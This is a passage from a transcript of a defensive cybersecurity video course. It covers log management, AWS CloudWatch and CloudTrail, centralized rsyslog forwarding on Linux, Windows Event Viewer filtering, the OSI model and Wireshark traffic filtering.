unencrypted format and then clearing the logs or removing them or tampering with them in some way that
would benefit a malicious user.
There are many different log sources. Individual host logs, the Syslog Daemon in UNIX and Linux. Firewall
logs, intrusion detection systems or IDSs, intrusion prevention's systems, IPSs, web application firewalls and
proxy servers.
[Video description begins] Web application firewall is abbreviated as WAF. [Video description ends]
In some cases, the enterprise might use a Unified Threat Management or UTM solution that uses many of these
functions all in one, such as being a firewall and intrusion detection system and a proxy server. So you might
get a wealth of information by reviewing logs from those types of appliances.
[Video description begins] Logging Options. [Video description ends]
There are many different types of logging options that can be tweaked to suit your specific needs. Verbose
logging is detailed logging. This is one of those things that you do not want on all the time, even though it
sounds like something you should do. Reason we don't want verbose logging on all the time for network
equipment or firewalls or hosts is because it's taxing on the system's hardware resources. Takes a lot of CPU
cycles and potentially disc I/O cycles to log every tiny detail.
So normally, verbose logging is reserved for troubleshooting or security incident research. You should always
encrypt log files so that should a device be compromised where log files are stored, the attacker still wouldn't
be able to get into the log to tamper with them or see what's going on. We should also enable log file integrity
so we can detect if anything has been tampered with within a log file. Log file should be backed up to alternate
locations and even the backups themselves should be encrypted. We should have log alerts. Log alerts could be
related to someone trying to open a log during irregular time of the day. Another take on log alerts is
determining what gets written to logs in the first place. You don't want to have alert fatigue, where everything
is written to a log even though it's not relevant. Over time, you'll be able to weed out false positives. In other
words, events that look like they might be malicious but really aren't. So you can tweak configurations and log
filtering to reduce those amounts of alerts. That way, security personnel can focus on alerts that actually have
meaning.
Centralized logging means that we might have hosts, in this example on the left web application servers in a
demilitarized zone, on a DMZ. DMZ is reachable from the public Internet. We might configure them to
forward their logs to a centralized logging and monitoring host on a different private network. Now, that
centralized logging and monitoring host would be configured with alerts, you would configure alert threat
thresholds. So for instance, if it looks like there's excessive requests for a back end database that might trigger
an alarm. And finally, we would make sure that all of that centralized logging is filtered properly, and then
backed up elsewhere stored in an encrypted form.
[Video description begins] Encrypted backup is done on a protected network. [Video description ends]
Now by doing this, the servers in the DMZ, you must assume at some point will be compromised if they're
publicly visible. But because they don't retain the only copy of log data we're in a good situation when it comes
to logging and monitoring, because that log data has been copied elsewhere.
Finally, there's log analysis, where we can based on past events that have been logged tweak our IDS and IPS
rules. We might even use a centralized log analysis system to correlate events together and perhaps generate
alerts. We might do that in the form of security information and event management or SIEM system. We might
use collections of tools like Elastic Search, Logstash and Kibana, otherwise called ELK. Now the Elastic
Search part of that is a search analytics engine. Logstash is a data processing and analytic tool. And Kibana is a
tool that lets you visualize data that results from Logstash.
[Video description begins] Topic title: Cloud Logging and Auditing. The presenter is Dan Lachance. [Video
description ends]
Organizations that rely on cloud computing need to be well versed in the solutions made available by the cloud
provider for monitoring logs and also for audit events.
[Video description begins] A web page called "AWS Management Console" opens. The page is divided into
three sections labeled "AWS services", "Access resources on the go", and "Explore AWS". The AWS services
section contains a search bar labeled “Find Services”. [Video description ends]
So here in Amazon Web Services, the first thing I'm going to search for here is cloudwatch. CloudWatch, as it
says here, is used to Monitor Resources and Applications. So we can see log events and we can even build
CloudWatch alarms, so we get notified when certain things occur.
[Video description begins] From the search results, he clicks an option called "CloudWatch" and a web page
called "CloudWatch Management Console" opens. It is divided into three parts. The first part is a toolbar. The
second part is a navigation pane. The third part is a content pane. A page called "CloudWatch: Overview" is
open in the content pane. It includes sections called "Alarms by AWS service" and "Recent alarms". The
Recent alarms section includes options called "RebootAppServer" and "Alarm1". [Video description ends]
For example, we can see some Recent alarms here about rebooting a server, or a volume queue being busy.
[Video description begins] He points to the RebootAppServer and Alarm1 options. [Video description ends]
That means disk I/O being busy for a specific virtual machine. And depending on the configuration, we'll also
be able to go in and view different types of logs that are available, depending on the cloud services that have
been deployed.
[Video description begins] He clicks an option called "Log groups" in the navigation pane and the
corresponding page opens in the content pane. [Video description ends]
For example, RDS stands for Relational Database Services. So I can view some of the metrics related to that
by going into the log stream and reading the specific details.
[Video description begins] He clicks a log group called "RDSOSMetrics" and the corresponding page opens.
A list of log streams is displayed. [Video description ends]
[Video description begins] He clicks a log stream and its corresponding page opens. [Video description ends]
[Video description begins] He clicks an option called "Metrics" in the navigation pane and the corresponding
page opens in the content pane. A tab called “All metrics” is open. [Video description ends]
For example, here in Amazon Web Services, I could go to EC2, which is for virtual machine instances
deployed in the cloud.
[Video description begins] He clicks an option called "EC2" and the corresponding page opens. [Video
description ends]
[Video description begins] He clicks an option called "Per-Instance Metrics" and the corresponding page
opens. [Video description ends]
And as I go further down, I can see this is for a host called Linux1. Maybe I'm interested in outbound network
traffic, so NetworkOut.
[Video description begins] He selects a checkbox adjacent to a row with a row entry labeled
“NetworkOut”. [Video description ends]
When I turn it on, the checkmark, it will graph any known activity for that. We can see here there's nothing
that appears.
So therefore, we don't have any activity for network traffic out in the related time frame that's been graphed.
[Video description begins] He opens the AWS Management Console web page. [Video description ends]
Let me go back to the main AWS page, and I'm going to search for cloudtrail, because on the auditing site, you
can track activity in the AWS cloud environment.
[Video description begins] From the search results, he selects an option called "CloudTrail". A web page
called “CloudTrail Management Console" opens. A table called “Recent events” is displayed in the content
pane. [Video description ends]
So we can see some recent events here. The User name that was responsible for the event, and the event itself,
such as deleting a subnet or deleting a database instance. Now we can also expand any of those specific items
to get more detail such as the region where that occurred, and the Source IP address.
[Video description begins] He expands an event in the table. [Video description ends]
That would be the IP address that was used by in this case user root to delete a subnet. So we have a lot of
details available here that are automatically tracked. So it's important then to be aware of how your cloud
solution allows you to view logged information and audit events.
In this video, learn how to send Linux log events to a centralized logging server.
Objectives
[Video description begins] Topic title: Centralized Linux Logging. The presenter is Dan Lachance. [Video
description ends]
Detecting indicators of compromise and then responding in a timely fashion is made easier when you have
centralized logging. And in Linux and UNIX we can do that easily with remote log forwarding. Here on my
Linux host, which I'm going to call the logging host.
[Video description begins] He opens a command prompt window. The following prompt is displayed: [ec2-
user@ip-172-31-88-210 ~]$. [Video description ends]
This is going to be the central server in our example that will receive log messages from other Linux hosts. So
I need to make some configuration changes. I'll start using the sudo command because some of these
commands require elevated privileges. I'm going to use the nano text editor to open up /etc/rsyslog.conf.
[Video description begins] He executes the following command: sudo nano /etc/rsyslog.conf. The contents of
the file are displayed in GNU nano 2.9.8. [Video description ends]
What I want to do in here is make sure I uncomment the lines for UDP and TCP reception of log information
from other hosts.
[Video description begins] He removes # before the following text, $ModLoad imudp, $UDPServerRun 514,
$ModLoad imtcp, and $InputTCPServerRun 514. [Video description ends]
Now you don't have to do both. You can do one or the other. But notice that the default port number here is
514. Okay, so having done that I'll press Ctrl+X and I'm going to type in the letter y for yes, I'll press enter to
write to the file and it's done. Now, at that point we are now ready to receive remote syslog information on
TCP and UDP ports 514. So let's say on this same central host I would run sudo, netstat to show the status of
network connections and port numbers and so on. And I'm going to pass in a bunch of command line
parameters here because specifically I want to look for a port number that is currently being listened on. And
I'm going to pipe that to grep and I'm going to look for rsyslog. And we don't get anything returned because
we've made the configuration change but we've not restarted the daemon.
[Video description begins] He executes the following command: sudo netstat -tnlpu | grep rsyslog. No output
is displayed and the prompt does not change. [Video description ends]
[Video description begins] He executes the following command: sudo service rsyslog restart. The output
reads: Redirecting to /bin/systemctl restart rsyslog.service. The prompt does not change. [Video description
ends]
And now at this point, if I just use the up arrow key and let's go back up to our netstat command. We can now
see that this server now has some listening ports, for 514.
[Video description begins] He executes the following command: sudo netstat -tnlpu | grep rsyslog. The output
displays details of the tcp, tcp6, udp, and udp6 ports. The prompt does not change. [Video description ends]
Okay, so this part is done, we're going to switch over to a different Linux host now and configure it to forward
log messages to this one that we've just enabled logging on. Now, what we should do before we leave this
server is get its IP address. So I'm going to type iif config so we can do that. Because we're going to need to
specify where we want to send log messages to.
[Video description begins] He executes the following command: ifconfig. The output displays the current
network configuration information. The prompt does not change. [Video description ends]
And I can see the IP here is 172.31.88.210. So we want to make sure that there's no firewalls blocking
connectivity over port 514. Otherwise this won't work. So that's good. Okay, let's go back to our other server
now.
[Video description begins] He executes the following command: ^C. No output is displayed and the prompt
does not change. He opens another command prompt window. The following prompt is displayed: [ec2-
user@ip-172-31-80-186 ~]$. [Video description ends]
So back on my first Linux host where I'm going to forward log messages to the centralized host I'm going to
run sudo nano against /etc/rsyslog.conf just like we did on our centralized logging host.
[Video description begins] He executes the following command: sudo nano /etc/rsyslog.conf. The contents of
the file are displayed in GNU nano 2.9.8. [Video description ends]
But what's different here is I need to go. I don't need to enable reception on port 514. This is not the centralized
logging host. I'm just going to go to the very bottom and I'm going to tell it that I want to send all types of
messages. Now the first asterisk would be from a specific subsystem because if I go up here notice we can
specify for example, mail messages mail.* would be all types of messages related to the mail subsystem or all
messages related to cron.
[Video description begins] He points to the following code: cron.*. [Video description ends]
If I want to send everything then I could put *.*. All facilities as they call them are all sources and all types of
messages, and I'm going to put in an at symbol and I'm going to specify the IP address of our centralized
logging host. Now we saw that on the previous Linux host when we ran if config. The IP is 172.31.88.210.
That's all we need to do on this host assuming that's what we want enable, I want all messages going there. So
I'm going to press Ctrl -X, type in the little y, press Enter. And of course, just like on our centralized logging
host to put that into motion, we need to restart the rsyslog daemon or service. So as you do service, rsyslog and
let's just go ahead and tell it restart and that's it.
[Video description begins] He executes the following command: sudo service rsyslog restart. The output
reads: Redirecting to /bin/systemctl restart rsyslog.service. The prompt does not change. [Video description
ends]
Okay, so the next thing we'll do on my initial source Linux server that is generating log messages isn't going to
force a log message using the logger command. And it's going to be, "Hello world from Linux", put that
message in quotes, and I'm going to press enter.
[Video description begins] He executes the following command: logger "Hello world from Linux". No output
is displayed and the prompt does not change. [Video description ends]
So I am manually sending a specific log entry. And I can view that on this host itself using the tail command,
which shows me the last few lines in the text file.
[Video description begins] He executes the following command: sudo tail /var/log/messages. The output
displays the last part of the file. The prompt does not change. [Video description ends]
So on this host, I've run sudo tail /var/log/messages, the system log file. Like I can see here I've got my hello
world from Linux but did that get sent over the network over port 514 to our centralized logging host. Let's
switch over to it. Let's take a peek.
[Video description begins] He opens the first command prompt window. The following prompt is displayed:
[ec2-user@ip-172-31-88-210 ~]$. [Video description ends]
So we're back here on our logging host where we can see it's listening on port 514. I'm going to run the same
command we just did a moment ago sudo tail /var/log/messages. Now I don't see the message here, but bear in
mind that the tail commands only show me the last 10 messages.
[Video description begins] He executes the following command: sudo tail /var/log/messages. The output
displays the last part of the file. The prompt does not change. [Video description ends]
So there might have been a lot of activity which is simply not seeing it. So instead, why don't we do this let's
run sudo cat to show the contents of /var/log/messages.
[Video description begins] He executes the following command: clear. The screen gets cleared and the prompt
does not change. [Video description ends]
We'll pipe that to the grep line filter and why don't we just look for the word Hello? I'll just have to make sure
I put in the correct file name here So it's messages not message.
[Video description begins] He executes the following command: sudo cat /var/log/messages | grep Hello. The
output reads: ip-172-31-80-186ec2-user: Hello world from Linux. The prompt does not change. [Video
description ends]
And indeed we can see that we have the Hello world from Linux message that was generated on the other
Linux host. And it was sent through centralized logging to this one.
6. Video: Windows Event Log Filtering (it_cscysa20_08_enus_06)
In this video, you will filter Windows logs to show only the relevant log entries.
Objectives
[Video description begins] Topic title: Windows Event Log Filtering. The presenter is Dan Lachance. [Video
description ends]
Windows systems use the event viewer as an interface to the logged data on a Windows system.
[Video description begins] He opens a window called "Event Viewer". It is divided into five parts. The first
part is a menu bar. The second part is a toolbar. The third part is a navigation pane. The fourth part is a
content pane. The fifth part is a pane labeled "Actions". [Video description ends]
And so we can take a look at any items that might have been logged related to a particular piece of hardware or
software in the device. So here on Windows 10, I've gone to the Windows Event Viewer on the local machine.
[Video description begins] He points to an option called "Event Viewer (Local)" in the navigation
pane. [Video description ends]
Although notice, I can right-click on that and choose Connect to Another Computer.
[Video description begins] A dialog box called "Select Computer" opens. [Video description ends]
So a technician then can reach out over the network if it's been configured, if it's allowed and firewall rules
don't prevent it. They can reach out over the network and view event log entries for remote network hosts
running the Windows operating system.
[Video description begins] He clicks a button called "Cancel" and the dialog box closes. [Video description
ends]
Now if I expand Windows Logs, there are a couple of standard items here.
[Video description begins] He expands an option called "Windows Logs" in the navigation pane. It contains
options called "Application", "Security", "Setup", "System", and "Forwarded Events". [Video description
ends]
The Application log, the Security log which is used for any audit configurations.
[Video description begins] He clicks the Security option and the corresponding details are displayed in the
content pane. [Video description ends]
Here, it's for User Account Management. But we could also choose to audit the success or failure of people
trying to access files in the file system. And the results would show up here in the Windows security log on the
host, where those files might exist. The main system log is simply called System.
[Video description begins] He clicks the System option and the corresponding details are displayed in the
content pane. It includes a table with five columns and several rows. [Video description ends]
And we can see the level, whether it's informational or some kind of a critical error, the date and time of the
logged entry. The source of it, the Event ID, which indicates what happened. So if you've got some kind of a
hard disk failure of a specific type, it will always generate the same Event ID. And you can filter or search on
that. See the Category, of course, when you select a log entry, you can see the Details down below. Under
General, you have a lot of information like the computer where that occurred, as well as further Details.
[Video description begins] He selects a tab called “Details”. It includes radio buttons called "Friendly View"
and "XML View". The Friendly View radio button is selected. [Video description ends]
So you can view it in XML for example, if you want to take a look at the data that way or copy and export it to
another system.
[Video description begins] He selects the XML View radio button. It displays various code. [Video description
ends]
Now as we go further down this list manually, we can see for instance that we have, in this case a couple of
errors and it's date and time stamped.
[Video description begins] He selects a row with a row entry called "Error" under a column header called
“Level”. [Video description ends]
Well, if we go back under general having selected that logged entry. Looks like it's for a wireless network
interface. It says, has determined that the network adaptor is not functioning properly. Well, that's not good.
Now other than manually scrolling through looking for this, for example in the System log. We can also right-
click on the System log and we can filter it.
[Video description begins] He right-clicks the System option in the navigation pane and selects an option
called "Filter Current Log". A dialog box called "Filter Current Log" opens. [Video description ends]
What I might say is, look, all I want to see is critical and error items. Don't care about anything else.
[Video description begins] He selects checkboxes called "Critical" and "Error" for an option called "Event
level". [Video description ends]
We could specify event ID numbers, certain keywords, user names, computer names. I'm just going to leave it
on Critical and Error and I'll click OK. Now, that is all that I am looking at. If I scroll right through down all
the way to the end, I'm only looking at those types of items that I filtered out for.
[Video description begins] He scrolls down the table. [Video description ends]
Sometimes when you're looking for that proverbial needle in a haystack related to a security incident, you're
going to need to filter out the noise. So you can just focus on the issue at hand.
[Video description begins] The Filter Current Log dialog box opens. [Video description ends]
So I'm going to right-click on System and choose Filter Current Log again and basically turn it off so I'm not
filtering any longer.
[Video description begins] He deselects the Critical and Error checkboxes. He clicks the OK button and the
dialog box closes. [Video description ends]
Now other than filtering, you can also right-click and choose Find and look for something specific within the
logs.
[Video description begins] He right-clicks the System option in the navigation pane and selects an option
called "Find". A dialog box called "Find" opens. [Video description ends]
[Video description begins] He clicks a button called "Cancel" and the dialog box closes. [Video description
ends]
Now over time you might find it cumbersome to come in and filter on errors or what not. So what you could
do is build a custom view.
[Video description begins] He points to an option called "Custom Views" in the navigation pane. [Video
description ends]
I'm going to right-click on Custom Views and choose Create Custom View.
[Video description begins] A dialog box called "Create Custom View" opens. [Video description ends]
Basically, I only want to see Critical and Error items in one place. And I don't want to have to keep filtering
the System log.
[Video description begins] He selects checkboxes called "Critical" and "Error" for an option called "Event
level". [Video description ends]
So I want to filter out Critical and Error items for specific logs.
[Video description begins] He clicks a drop-down list box called "Event logs". It includes options called
"Windows Logs" and "Applications and Services Logs". [Video description ends]
Let's say the Windows System Log and under Application and Service Logs.
[Video description begins] He expands the Windows Logs option and selects a checkbox called
"System". [Video description ends]
Maybe I'll also choose under Microsoft Windows, just scroll down here, CloudStore.
[Video description begins] He expands the Applications and Services Logs option. He further expands an
option called "Microsoft". He then expands an option called "Windows" under the Microsoft option. He then
selects a checkbox called "CloudStore". [Video description ends]
So I can select exactly what it is I want to filter out, in other words the source of those log events. And as
usual, as we saw when we were filtering, I can filter by event ID, user name, keyword, computer, all that stuff.
I'm just going to go ahead and create this.
[Video description begins] He clicks a button called "OK" and the dialog box closes. A dialog box called
"Save Filter to Custom View" opens. [Video description ends]
It's going to be called, this Custom Views is going to be called Nothing But Problems. That's really what it's
going to show me. And I'll click OK.
[Video description begins] An option called "Nothing But Problems" is displayed under the Custom Views
option in the navigation pane. The corresponding details are displayed in the content pane. It includes a
table. [Video description ends]
There it is, Nothing But Problems. It will always be here in the left hand navigation panel under Custom
Views, and all I'm going to see is problems. We asked for critical and error, that's all we're ever going to see
naturally. Make sure you're always looking at the date and timestamps so you're not taking action on
something that occurred one year ago.
Not that that's not still important, but ideally you will have already dealt with that issue. Now I can also right-
click on that item and I have the option of filtering the custom view.
[Video description begins] He right-clicks the Nothing But Problems option in the navigation pane and selects
an option called "Filter Current Custom View". A dialog box called "Filter Current Custom View"
opens. [Video description ends]
So I can even filter it further for specific keywords, or computer names or user names or event IDs. All of this
stuff is entirely possible. It's just really about filtering out the noise and getting to what matters. And
determining if an incident occurred, and then in dealing with the incident response for that item.
[Video description begins] Topic title: Cloud Alarms. The presenter is Dan Lachance. [Video description
ends]
While it's important to connect to and monitor hosts on the network to mitigate security threats, it's usually a
better configuration when you automate this. And that means configuring thresholds that when violated, notify
administrators. Such as when there's a spike in activity or some kind of abnormal activity. So here in the
Amazon Web Services cloud, we're going to do that for a virtual machine and EC2 instance, when it CPU gets
beyond a certain point of busy-ness.
[Video description begins] A web page called "AWS Management Console" opens. [Video description ends]
So to get started here in the AWS Management Console, I'm going to click on EC2 to open up the EC2
Management Console, we'll click Instances on the left.
[Video description begins] The corresponding page opens. [Video description ends]
You have got a number of Windows and Linux instances. I'm interested in Linux1. When I select that EC2
instance or that cloud based virtual machine, down below I can open up the Monitoring tab. And from here, it
says No alarms configured. I can create an alarm. So I'm going to click Create alarm.
[Video description begins] A dialog box called "Create Alarm" opens. [Video description ends]
Now I can send a notification or I can take a particular action, such as to reboot the instance if it's not
responding or anything along those lines. But I can also send a notification to what's called a topic. You can
select an existing topic from the list. I've already got one called Topic1, where you can click the link to create
one.
[Video description begins] He clicks a link called "create topic" and a text box called “With these recipients”
appears. [Video description ends]
Now a topic can be used to send email messages to a recipient group. So we have a number of options to do
that. So I'm going to go back and cancel and leave that on an existing topic called Topic1 that contains a group
email address. I want to send a notification, but under what circumstances.
[Video description begins] He clicks a drop-down list box called "Whenever" and a list opens, which includes
options called “Average”, “Minimum”, and “Maximum”. The Average option is selected. [Video description
ends]
Down below, I can select for example, the Average CPU Utilization although there are many other metrics I
might be interested in looking at.
[Video description begins] Adjacent to the Whenever drop-down list box, he clicks a drop-down list box called
“of” and a list opens, which includes options called “CPU Utilization”, “Network In”, and “Disk Writes”.
The CPU Utilization option is selected. He then enters 85 in a text box called "Percent". [Video description
ends]
And if it's greater than, let's say 85% for at least one consecutive period of 5 Minutes, then I want this to be
triggered. Down below, I'm going to click Create Alarm.
[Video description begins] A message box called "Alarm created successfully" opens. [Video description ends]
[Video description begins] He clicks a button called "Close" and the message box closes. [Video description
ends]
Now currently here under the Monitoring tab for that instance, it says 1 of 1 in INSUFFICIENT DATA.
[Video description begins] He points to the Linux1 instance. [Video description ends]
And if I click on that, we don't have any data yet because we've just created the alarm. It doesn't know how
busy the CPU is. But we do see that we have that configuration listed here.
Upon completion of this video, you will be able to list how the 7 layers of the OSI model relate to
communications hardware and software.
Objectives
list how the 7 layers of the OSI model relate to communications hardware and software
[Video description begins] Topic title: OSI Model. The presenter is Dan Lachance. [Video description ends]
If you've been working in IT for some time, you might already be familiar with the open systems interconnect
or OSI model.
[Video description begins] Open Systems Interconnect (OSI) Model. [Video description ends]
If you're not, don't worry, we're going to talk about it. The OSI model is a seven layered conceptual model.
That's used to describe the interworkings of network software and hardware on a sending device and on a
receiving device across a network.
The first layer of the OSI model is the physical layer. Second one is data link. The physical layer deals with
physical components, like cables, whether we're using twisted pair copper wires or fiber optic. Connectors,
whether we're using RJ-45 network connectors or Straight Tip, ST, for fiber optic. Electrical specifications
such as transmission frequencies. That's all physical layer stuff. The data link layer deals with media access
methods, how to access network transmission media. Whether it's Ethernet, token ring or accessing wireless
transmission frequencies. The MAC address, the Media Access Control address is a 48-bit hexadecimal
address unique to a network interface. Whenever it's an Ethernet card or a token ring card or a WiFi card. So
MAC addresses apply to layer two, the data link layer. And network infrastructure devices like bridges and
switches also apply to layer two.
Now, be careful, because there also is such thing as a layer three switch. If the switch only is interested and
deals with MAC addresses, then it's called a layer two switch. Focus on layer three in a moment. Layer three is
the network layer, and layer four is the transport layer. Layer three, the network layer of the OSI model, deals
with software network addresses like IP addresses for IPv4 or IPv6. The network layer also deals with the
routing of packets across networks to get to a target through the most efficient path. So therefore routers would
apply to layer three. And whether you're configuring static routes or using dynamic route learning, all of that is
layer three stuff.
Now if you've got a layer three switch. It means beyond what it does at layer two with remembering MAC
addresses plugged into specific ports. It can also deal with working with layer three addresses, like IP
addresses. Layer four, the transport layer uses transport mechanisms to ensure end to end delivery between a
sending and a receiving host on a network. So that means protocols like Transmission Control Protocol, TCP,
and User Datagram Protocol, UDP, apply to layer four. Now UDP is best effort. It just transmits out on the
network and hopefully the recipient got what it needed. Hopefully you've got everything, there's no checking.
TCP is much more careful.
A connection session must be established before transmitting. And then every transmission that's sent must be
acknowledged by the receiver. So TCP has more overhead, but it's also more careful. Addresses that apply at
layer four would not be MAC addresses or IP addresses but port addresses. Such as for an HTTP web server,
TCP port 80. Or if it's secured with a PKI certificate, so HTTPS, you would use TCP port 443. SMTP mail
servers use port 25, that type of thing. Port addresses apply to layer four, the transport layer. Layer five of the
OSI model is the session layer. Layer six is presentation. Layer five, the session layer deals with network
session. So establishing a session, maintaining it and then tearing it down once the transmission is complete.
Now you might say, this means like user login. It doesn't have to involve user authentication.
You can set up a session for the sole purpose of transmitting something across a network. Without dealing with
usernames, passwords or authentication at that level. There's also the negotiation of session parameters, such as
if we're going to use an encryption algorithm and how strong the key will be and so on. Layer six, the
presentation layer of the OSI model deals with how data that gets transmitted over the network is presented.
Hence, presentation. But, what do you mean, presented? Well, whether it's encrypted or not, whether it's
compressed or not, the specific character set that's being used.
[Video description begins] The presentation of transmission of data over the network also includes
decryption. [Video description ends]
So for example, ASCII versus Unicode characters, all of that type of stuff.
Finally, we get to the top of the OSI model, layer seven, the application layer. This deals with application-
specific data. Now, it can involve direct user action, but it doesn't have to. It doesn't necessarily mean the user's
clicking on things and typing things in. But it deals with any type of app, including APIs, so programmatically
calling upon functions. And other higher level protocols like DNS for name resolution. FTP for file transfer.
Trivial FTP for file transfer without authentication.
[Video description begins] Trivial FTP is abbreviated as TFTP. [Video description ends]
[Video description begins] Mapping Packet Headers to the OSI Model. [Video description ends]
Now, the last thing we'll look at here is how you might map packet headers to the OSI model. For instance, if
you're analyzing network traffic by capturing it off the network using tools such as tcpdump in UNIX and
Linux or Wireshark. So the Ethernet header applies to OSI Layer 2, of the Data Link Layer. The Ethernet
header is a part of every packet in an Ethernet network. It contains the source and destination MAC addresses
that are used to get transmissions or frames sent around. Now take note that on a local area network, if you are
transmitting to another device on the LAN, local area network. Your MAC address is the source and that host's
MAC address is the destination. But if you're communicating, let's say with something on the Internet. The
destination MAC address that your machine is concerned with is not the MAC address of the other host
somewhere else on the Internet. It's of your local default gateway, your router. The IP Header in a packet
capture would apply to OSI Layer 3, the Network Layer. And as we know, Layer 3 deals with IP addresses,
source and destination.
So if I have a Layer 3 firewall, guess what? It has the ability to look at anything in layers 1, 2 and 3, like IP
address information, MAC addresses, and so on. Layer 4, the TCP header in the case of using software that
uses TCP, because Layer 4 could also be UDP. But in this case, we're saying it's TCP. So that applies to the
transport layer. And that would include things like source and destination port addresses. So a user connecting
to a standard web server on port 80 would be in the TCP header, that would be the destination port. Where the
source port is a higher level port that the web server uses to communicate back with that client station. Finally,
the Payload of the data, the detail of the packet would fall somewhere within OSI Layers 5 through to 7.
Depending on the exact type of transmission. So Layer 5 is the Session Layer, layer 6 is Presentation and you'll
recall that Layer 7 is the Application Layer. Now the data shows up in the payload of the transmission. And
depending on how things have been configured will determine whether or not that payload is encrypted or can
be viewed in plain text.
describe common items to look out for when analyzing network traffic
[Video description begins] Topic title: Network Traffic Analysis. The presenter is Dan Lachance. [Video
description ends]
One of the responsibilities that is often tasked to a cybersecurity analyst is the analysis of network traffic.
There is a wide array of tools available out there for performing this kind of work. Multi Router Traffic
Graphers or MRTGs are tools, and there are plenty of free versions of tools to do this. It allows you to monitor
network traffic on a network link, and measure the network traffic load on that link, and then also to visualize
it using graphs. So there are plenty of tools like this. The key with a lot of network traffic analysis tools is
placement. Are you placing it where it can see all of the network traffic it needs to see? Now, you can also
analyze traffic using tools like Wireshark, so packet sniffers. And you can save the capture file, so that you can
analyze it at a later time or you can forward it off to someone with the expertise and ability to analyze it. And
there are even some free websites, where you can upload a packet capture file and it will identify any
anomalies.
Now bear in mind, identifying an anomaly is really specific to an organization and how they use their network.
But there are some general things that can be looked at to determine that it's abnormal or suspicious activity.
So identifying suspicious activity is a big part of network traffic analysis. It's not only that, but it's also to make
sure that the network is performing as best as it can. We don't want to have a lot of unnecessary network traffic
if we don't need to have it there. Now we've already stated that you can save network traffic to a capture file
for later analysis, but you can also capture it and have it analyzed live. Now, usually, we'll use automated
solutions to do this but technically, you could as a network analysis expert, capture traffic and analyze it as it
comes in.
[Video description begins] Packet Header Analysis. A screenshot of a window called "malware.pcap" is
displayed. [Video description ends]
Now, this means having a strong understanding of packet headers and the OSI seven-layer conceptual model.
In this example, we are looking at a packet capture in the free Wireshark tool. And so we can see that we have
a number of packet headers in the middle section. We can see the Ethernet2 header, that shows us the source
and destination MAC addresses. The first part of the MAC address might be prefixed with a vendor name like
Cisco or Dell because the first couple of parts of the MAC address do identify the vendor.
After that, we see in this case, this particular selected packet that we have an IP or Internet Protocol version 4
header. And there are many pieces of information in there, including towards the bottom of that header, the
Source and Destination IP addresses. Then we can see after that based on the specific transmission, if we look
at the first highlighted packet here at the top, it's a DNS packet. So DNS queries use UDP, that's the transport
mechanism for layer 4 of the OSI model. So User Datagram Protocol then is another header we see here with a
Source and a Destination port. So here the destination port is 53, that's DNS query traffic on its way to a DNS
server. So it's important to be able to look at these types of things to analyze network traffic. You have to know
what you're looking at.
[Video description begins] Intrusion Analysis: The Diamond Model. [Video description ends]
The other thing to think about when you're analyzing traffic is determining whether an intrusion is taking place
or not. And something that can help with that is the diamond model. It is a framework for intrusion analysis. It
starts by looking at the adversary, who is the adversary? Is it someone on the inside of the network, someone
on the outside? Now, even if you know how to analyze network traffic to say, that transmission came from
inside the network because of the TTL or the time to live in the IP header. Well, that is easily forged with
freely available tools. So we have to take what we're looking at in network traffic analysis with a grain of salt
with the understanding some of that traffic could have been forged or spoofed.
The next part of the diamond model is looking at infrastructure. So what are they trying to compromise or do
we have someone that's scanning every host on the network? Using some kind of a port scanning tool like
nmap. So or they are focusing on an individual host, maybe trying to exploit previously discovered
vulnerabilities. We have to look at the tactics or the techniques that the potential attackers are using. So besides
reconnaissance, what tools are they using and are they trying to break into perimeter devices and then for
lateral movement in the network go through it to access other devices at that level? And then finally, of course,
we have to look at the victim device or network that was targeted. Why was it targeted? You can even use the
diamond model to analyze how social engineering attacks with phishing emails actually occur and might be
used to deliver ransomware.
In this video, you will learn how to filter captured network traffic.
Objectives
[Video description begins] Topic title: Wireshark Traffic Filtering. The presenter is Dan Lachance. [Video
description ends]
Using Wireshark to capture network traffic is very useful so that we can learn about what's on the network.
Which in turn could tell us what perhaps should not be on the network any longer. It also allows us to identify
traffic patterns, potentially identify any security issues, such as intrusions on the network. It allows us to
increase the performance of the network and so on. So we can either filter traffic as it's captured. Or you can
filter it after it's been captured, which is then called a display filter as opposed to a capture filter.
Here in Wireshark, I've already got a specific packet capture opened up, so we can see each line of course is a
packet.
[Video description begins] He points to the first section. It includes a table with seven columns and several
rows. The column headers are: No., Time, Source, Destination, Protocol, Length, and Info. [Video description
ends]
And when we select one of those packets in the middle, we can see the packet headers.
[Video description begins] He points to the second section. [Video description ends]
And of course, as we go through and select parts of the packet headers. We can see what's being selected down
below, to the eventual payload stored between the packet.
[Video description begins] He points to the third section. [Video description ends]
Now, filtering out this information is going to be important because notice as I scroll through, there's quite a
bit of information here. So what we can do then is start applying a display filter at the top in the address bar
where it says, Apply a display filter.
[Video description begins] He scrolls down in the first section. [Video description ends]
And we can start with easy stuff, for example if I want to only see arp or Address Resolution Protocol traffic, I
can simply type arp, press Enter. And notice that we've now filtered the list to only show us arp traffic.
[Video description begins] He points to the first section. [Video description ends]
[Video description begins] He selects a row with a row entry “Motorola_88:f1:59” under the Source column
header. The corresponding details are displayed in the second section. [Video description ends]
And we can see in the packet headers, we've got the Ethernet frame with the broadcast of all f's in hex.
[Video description begins] He expands a section called "Ethernet II”. [Video description ends]
So broadcast at the MAC address level layer two of the OSI model.
[Video description begins] He points to the following text: "Destination: Broadcast (ff:ff:ff:ff:ff:ff)". [Video
description ends]
In parentheses you see the full hex value of that source MAC address. But the first three portions of that hex
address identify the vendor, in this case Motorola.
[Video description begins] He points to the following text: "5c:51:88". [Video description ends]
So that's why you've got these two variations of the source MAC address. And after that, you can see the
address resolution protocol or ARP header with some of the details here.
[Video description begins] He expands a section called "Address Resolution Protocol (request)". The details
include: hardware type and protocol type. [Video description ends]
Notice there's no IP header. What that means is that ARP is a local area network protocol, it doesn't work
across routers. But we can also filter based on other types of traffic. So for example, if I'm interested in HTTP
type of traffic I could specify that.
[Video description begins] He enters http in the address bar. The corresponding details are displayed in the
first section. [Video description ends]
And now we're filtering the list to only see HTTP communications, so we can see the Source and Destination
IP addresses. Of course, in this case, we know the protocol is HTTP, that's what we filtered on. And then we
have a little bit of detail or info about type of transmission. Of course, if you want to learn more about the
transmission, you should be looking in detail at the appropriate packet headers.
[Video description begins] He points to the second section in the content pane. [Video description ends]
Such as the TCP header, or perhaps the HTTP header, or whatever the case might be to actually see what's
happening. And notice, we can actually see some clear text here.
[Video description begins] He points to the third section in the content pane. [Video description ends]
This is not an encrypted transmission. Now, we can also filter on things like addresses. For example, ip.addr,
and I could put in a double equal sign. And if I want to filter on a particular IP address, so 192.168.4.24, then I
